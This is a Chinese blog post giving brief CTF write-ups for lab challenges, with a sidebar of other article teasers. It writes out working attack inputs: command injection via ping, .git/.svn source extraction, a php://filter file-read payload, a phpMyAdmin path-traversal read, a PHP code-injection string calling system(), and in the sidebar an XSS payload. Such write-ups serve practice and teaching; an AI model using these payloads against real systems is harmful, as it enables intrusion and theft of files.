csctfctftest

最新推荐文章于 2024-09-10 10:40:14 发布
最新推荐文章于 2024-09-10 10:40:14 发布
阅读量80 收藏
点赞数
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nshen0000/article/details/132043508
版权

RCE

打开浏览器,访问靶机

Ping 127.0.0.1

Ping 127.0.0.1|ls 这时会显示出flag.php文件

127.0.0.1|cat flag.php 然后查看页面源代码,就能看到flag

Git

靶机之后加/.git

http://172.16.200.100:27700/.git/

下载git破解工具,下载python

py -3 GitHack.py http://172.16.200.100:27700/.git/

到破解工具文件夹中找下载的index.php

本地文件打开index.php

Svn

靶机之后加/.svn

直接点击wc.db,里面有flag

Easyweb200

打开靶机,点击上传文件

改op=后面的内容php://filter/convert.base64-encode/resource=flag

拿到一串码

然后用转码工具,base64ToText

Database

打开靶机,下载目录扫描工具

管理员执行  py -3 .\dirsearch.py -u http://172.16.200.100:25612/

扫描到:http://172.16.200.100:25612/phpmyadmin/

地址改成:/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

就能看到flag

Pigs

打开图片,下载图片隐写监测工具,java运行,截图

下载二维码扫描工具,加载图片,获得flag

Easyweb

adadmiadminmin

dumpster_diving

下载后用工具查看二进制码,直接搜索flag{

Magic

QNKCDZO

Easytest

查看源代码

Mfw

Git扫描工具扫描,看源码

?page=123') or system("cat templates/flag.php");//

查看源文件

nshen0000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
test.ctf8 xss注入解题记录
qq_43623492的博客
04-02 4357
Level 1 页面没有文本框,但可以从URL下手 payload:test.ctf8.com/level1.php?name=<script>alert('ok')</script> Level 2 随便输入点什么,查看页面源码,发现我们输入的内容被困在了input的value属性内,那就闭合他们 payload:"><script>alert('ok...
CTF Wireshark Test-flag-please-ignore
热门推荐
艺博东的博客
10-06 1万+
文章目录 一、Wireshark 题目附件: 附件1 1、 附件1 链接:https://pan.baidu.com/s/1wHzTvsX3W2nHgqObyeT1vg 提取码:jtbs 2、文件 3、用“Notepad”打开misc10文件 十六进制: 666c61677b68656c6c6f5f776f726c647d 4、16进制转换文本 在线,十六制进制转换文本
“百度杯”CTF比赛 九月场 | TEST
g1ut_t0ny的博客
07-04 359
TEST 1、题目提示会查资料就可以拿一血 2、打开题目很明显是海洋CMS,所以直接搜索他的相关漏洞 3、由于我做题比较晚,所以很明显,等待我的只能是一堆wp 4、白嫖开始 5、在common.inc.php中找到了数据库的相关信息,添加配置 6、管理数据库 ...
spring事务详细讲解-深入浅出
小电玩
09-08 416
Spring 事务是本身就是对数据库的事务的支持,没有数据库的事务 Spring 是本身无法实现事务的。Spring只提供了统一事务管理接口,具体的实现还是由各数据库自己实现。在使用 Spring 事务时,可以通过注解或编程方式将需要进行事务管理的方法和代码块标记为事务性操作,当这些操作被执行时,Spring 会负责开启时根据当前环境中设置的隔离级别,调整数据库隔离级别。
Java多线程:深入探索与详细解析
m0_63550220的博客
09-08 1424
作为Java中的基本执行单元,线程是轻量级的进程,由线程ID、程序计数器、Java虚拟机栈、本地方法栈、和线程私有内存等部分组成。每个线程都有独立的执行路径,但共享进程的资源(如内存)。:进程是系统资源分配的基本单位,它包含了一个或多个线程以及这些线程运行所需的资源。在Java中,JVM(Java虚拟机)就是一个进程,而运行在JVM上的多个线程则共享JVM的内存空间。:并发指的是多个任务在同一时间段内交替执行,而并行则指的是多个任务在同一时刻真正同时执行。
JAVA基础:数据类型、命名规范
weixin_53755148的博客
09-05 1349
变量类型就是用来指定变量中存储数据的类型。也称为数据类型。
Java集合:Stack详解
yang_brother的博客
09-10 352
Java 中的Stack类是一个后进先出(LIFO, Last In First Out)的数据结构,它继承自Vector类。尽管Stack是一个可用的类,但它被认为是遗留的,并且在新代码中不推荐使用。通常建议使用Deque或ArrayDeque作为替代。
币安/OK现货合约量化系统APP开发
I592O929783的博客
09-08 491
后端:考虑系统需要处理大量实时数据和高频交易的特点,选择高性能的编程语言和技术框架,如Python的Django或Flask框架,Java的Spring Boot等。用户交互界面:设计直观易用的用户交互界面,包括交易界面、策略配置界面、风险管理界面等,方便用户进行交易操作、策略配置和风险管理。市场数据接入:开发市场数据接入模块,从币安等交易所或数据服务商获取实时的市场数据,包括行情数据、订单簿数据、成交数据等。前端:选择适合开发复杂界面的前端框架,如React、Vue.js等,以提供用户友好的交互界面。
自定义Stater
m0_63624484的博客
09-07 694
我们平时在导入依赖的时候,大部分导入的都是xxx-spring-boot-stater。那是因为它们都基于spring的规则将写好的框架定义成一个stater,这样方便springboot引用它们写好的功能。那我们为什么也要自定义stater呢?
基于JavaWeb开发的JavaSpringboot+Vue实现前后端分离房屋租赁系统
央顺科技官方博客
09-05 557
2021年处于信息科技高速发展的大背景之下。在今天,缺少手机和电脑几乎已经成为不可能的事情,人们生活中已经难以离开手机和电脑。针对增加的成本管理和操作,各大商家非常有必要建立自己的网上房屋租赁平台系统,这既可以让更多的人体验到网络所带来的方便,也有助于提高房屋的租赁。在经过几十年的高速发展后,互联网已成为最流行、最普及的媒体,每天的信息流量甚至能比得上过去十年。其以便捷的信息交换、快速的沟通速度,悄然地改变着会员的消费方式。
MyBatis面试
Tony_yitao的博客
09-09 552
MyBatis面试
springboot数据库连接由localhost改成IP以后访问报错500(2024/9/7
不起眼小菜菜的博客
09-07 309
步骤很详细,直接上教程……
SpringBoot总结
2302_77073236的博客
09-06 243
都做成图了,方便理解和掌握全局关系。
基于SpringBoot的多媒体信息共享平台开发
qq_45800365的博客
09-06 221
基于SpringBoot的多媒体信息共享平台开发,java项目。eclipse和idea都能打开运行。推荐环境配置:eclipse/idea jdk1.8 maven mysql前端技术:vue,Ajax,Json后端技术:SpringBoot,MyBatis本系统共分为两个角色:管理员和用户。主要功能有:后台:系统首页个人中心用户管理作品分类管理作品信息管理私聊信息管理系统管理前台:首页作品信息公告信息后台管理个人中心。
在IDEA中如何创建web项目?——不使用Archetype
m0_46977298的博客
09-10 349
在IDEA中不使用Archetype创建web项目。
从内存层面分析Java 参数传递机制
weixin_54574094的博客
09-06 885
基本数据类型的参数传递是值传递,修改方法内部的值不会影响外部变量,因为每个方法调用都有自己的栈帧。引用数据类型的参数传递是引用传递,修改方法内部的对象内容会影响外部变量,因为它们指向同一个对象。栈帧中的引用指向相同的对象内存地址。String类型是不可变的,对String对象的修改会创建一个新的对象,原始对象保持不变,这与对象的可变性相关。
Java中项目名、包名、类名、接口名、方法名、类名命名规范(简单示范)
weixin_70495659的博客
09-08 270
【代码】Java中项目名、包名、类名、接口名、方法名、类名命名规范(简单示范)
SpringBoot2:请求处理原理分析-接口方法的返回值处理(returnValueHandlers)
最新发布
Brave_heart4pzj的博客
09-10 385
SpringBoot
Spring事务和事务传播机制(下)
2202_76101487的博客
09-05 369
本文主要写了事务的隔离机制和传播机制;
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值